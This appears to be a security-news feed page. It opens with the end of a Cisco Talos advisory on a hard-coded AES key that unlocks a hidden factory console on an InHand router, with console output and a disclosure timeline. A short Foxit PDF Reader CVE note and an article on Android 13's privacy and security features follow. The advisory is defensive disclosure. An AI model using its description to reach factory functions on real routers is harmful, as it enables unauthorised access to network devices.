The hard-coded data provided at [1] are decrypted, at [4], using AES with a hard-coded key. An attacker, in possession of low-privileged user credentials, would be able to access the infactory functionalities.

**Exploit Proof of Concept**

Using the infactory command and providing the correct password will list the infactory functionalities:

    Router> infactory
    input password: 
    Router(factory)# 
    get help for commands
    ------------------------------------------------
    type '?' for detail help at any point
    ================================================
      help           -- get help for commands
      language       -- Set language
      exit           -- exit current mode/console
      reboot         -- reboot system
      factory-model  -- hardware model configure
      modem          -- modem test
      reset-key      -- check the status of the reset button
      com            -- detecting serial ports
      port           -- FCT network port test
      net            -- complete machine network port test
      led            -- LED lights test
      wlan           -- Wi-Fi test
      mem            -- check memory
      hw_wdg         -- check the hardware watchdog status
      dio            -- detect digital I/O
      stategridsec   -- detect stategrid security chip
    Router(factory)# 
    

**Vendor Response**

The vendor has updated their website and uploaded the latest firmware on it. https://inhandnetworks.com/product-security-advisories.html https://www.inhandnetworks.com/products/inrouter300.html#link4

https://www.inhandnetworks.com/upload/attachment/202205/10/InHand-PSA-2022-01.pdf

**Timeline**

2022-03-28 - Vendor Disclosure  
2022-05-10 - Public Release  
2022-05-10 - Vendor Patch Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-27172: TALOS-2022-1496 || Cisco Talos Intelligence Group

Foxit PDF Reader and PDF Editor before 11.2.2 have a Type Confusion issue that causes a crash because of Unsigned32 mishandling during JavaScript execution.

CVE-2022-30557: Security Bulletins | Foxit Software

With its latest mobile OS update, Google aims to simplify the adoption of Android’s protective features for users and developers alike.

For years, Android’s security and privacy teams have been wrestling the world’s most popular mobile operating system to make it more controllable and updatable while still being open source and easy to deploy. And while scams, malware, and rogue apps are still real threats, the debut of Android 13 at Google’s I/O developer’s conference on Wednesday feels less like triage mode and more like a logical iteration. As Charmaine D'Silva, Android’s director of product management puts it, “This is the release where we bring it all together.”

If anything, the big problem for Android security and privacy now is trying to get users, device makers, and developers to understand and be motivated to use a slew of new and recently released protective features. And after setting so many privacy and security initiatives in motion over the past few years, there's a huge amount for the Android team to maintain and try to get right at any given time.

“We will continue to go deeper, and that’s going to be a continued investment, but the challenge as you go deep is you end up fragmenting experiences, you end up actually confusing users unintentionally,” says Krish Vitaldevara, Android senior director of product management. “That’s a very hard problem to solve, and that’s what we’re going to solve with Android 13.”

Google Play Protect now scans about 125 billion apps per day on user devices to assess their behavior and attempt to identify security issues. And Google says that its Messages app now blocks 1.5 billion spam messages per month in an attempt to cut down on phishing and other scams that actually reach users. And after finally introducing end-to-end encryption in Messages last year for one-on-one texting with the long-awaited RCS messaging standard, Google says that later this year it will add end-to-end encryption in beta for group chats as well.

“We feel both excited and hopeful,” Jan Jedrzejowicz,  a Messages product manager tells WIRED. “Excited because providing out-of-box and encrypted-by-default group text messaging on Android is a huge upgrade for a large number of people all over the world. Hopeful because cross-platform messaging still uses SMS/MMS, and we really hope we can upgrade that to a more modern and encrypted protocol.”

Android 13 imposes more limitations and user controls for the permissions apps are granted and what data they can access when. For example, the operating system gives developers the option to easily incorporate Google’s “Photo picker” that lets users choose specific photos and videos to share with an app through the conduit of the picker, rather than granting the app access to their full photo library. Google has increasingly leaned on the system access that Android already has to provide specific data to apps, making it more like the bartender who’s mixing drinks than the cashier at the liquor store. Similarly, Android 13 now requires apps to request permission to access audio files, image files, and video files separately as part of an effort to limit access to different storage buckets.

Android already limited how much access apps had to the clipboard and notified users when an app grabbed something from it. But Android 13 adds another layer by automatically deleting whatever is in your clipboard after a short interval. This way, apps can’t find out old things that you copied, and—bonus—you’re less likely to inadvertently share your coworker’s list of reasons they hate your company with your boss. Android 13 also continues a process of reducing apps’ ability to require location sharing for things like enabling Wi-Fi. 

Android 13 requires new apps to ask permission before they can send you notifications. And the new release expands on a feature from Android 11 that automatically resets an app’s permissions once you haven’t used it for a long time. Since its debut, Google has extended the feature all the way back to devices running Android 6, and the operating system has now automatically reset more than 5 billion permissions, according to the company. This way, a game you don’t play anymore that had permission to access your microphone three years ago can’t still listen in. And Android 13 makes it easier for app developers to remove permissions proactively if they don’t want to retain access for longer than they absolutely need.

Making sure that Android devices around the world can get security updates has been a core hurdle for Google, since Android’s open source ethos allows any manufacturer to deploy its own version of the operating system. To improve the situation, the company has spent years investing in a framework called Google System Updates that breaks down the operating system into components and allows phone makers to directly send updates for the different modules through Google Play. There are now more than 30 of these components, and Android 13 adds ones for Bluetooth and ultra-wideband, the radio tech used at short range for things like radar.

Google is working to reduce common vulnerabilities that can show up in software by rewriting some crucial parts of the Android code base in more secure programming languages like Rust and creating defaults that nudge developers in a more secure direction with their own apps. The company has also worked to make its application programming interfaces more secure and has started offering a new service called Google Play SDK Index that provides some transparency into widely used software development kits, so developers can be more informed before they incorporate these third-party modules into their apps.

Similar to Apple’s iOS Privacy Labels, Android recently added a “Data Safety” field in Google Play to give users a sort of nutrition-fact label explaining how apps say they will handle your data. In practice, though, these types of disclosures aren’t always reliable, so Google is offering developers the option to have a third party independently validate their claims against an established mobile security standard. The process is still voluntary, though.

“We provide all these tools to developers to make their apps safer, but it’s important that they can actually prove that out and validate it through an independent third party, a set of labs testing against an established standard,” says Eugene Liderman, director of Android Security Strategy.

Android and Apple’s iOS have both been moving toward offering the ability to store government-issued identification. In Android 13, Google Wallet can now store such digital IDs and driver’s licenses, and Google says it’s working with both individual states in the United States and governments globally to add support this year.

With so much to focus on and refine, Android 13 attempts to take a sprawling situation and rein it in rather than letting it spin out of control. And Android's D'Silva says there's one release coming later this year that she's particularly looking forward to: a sort of safety center within Settings that will centralize privacy and security options in one location for users. An acknowledgment, perhaps, that it's all become too much for the average user to keep track of on their own.

Tag

#wifi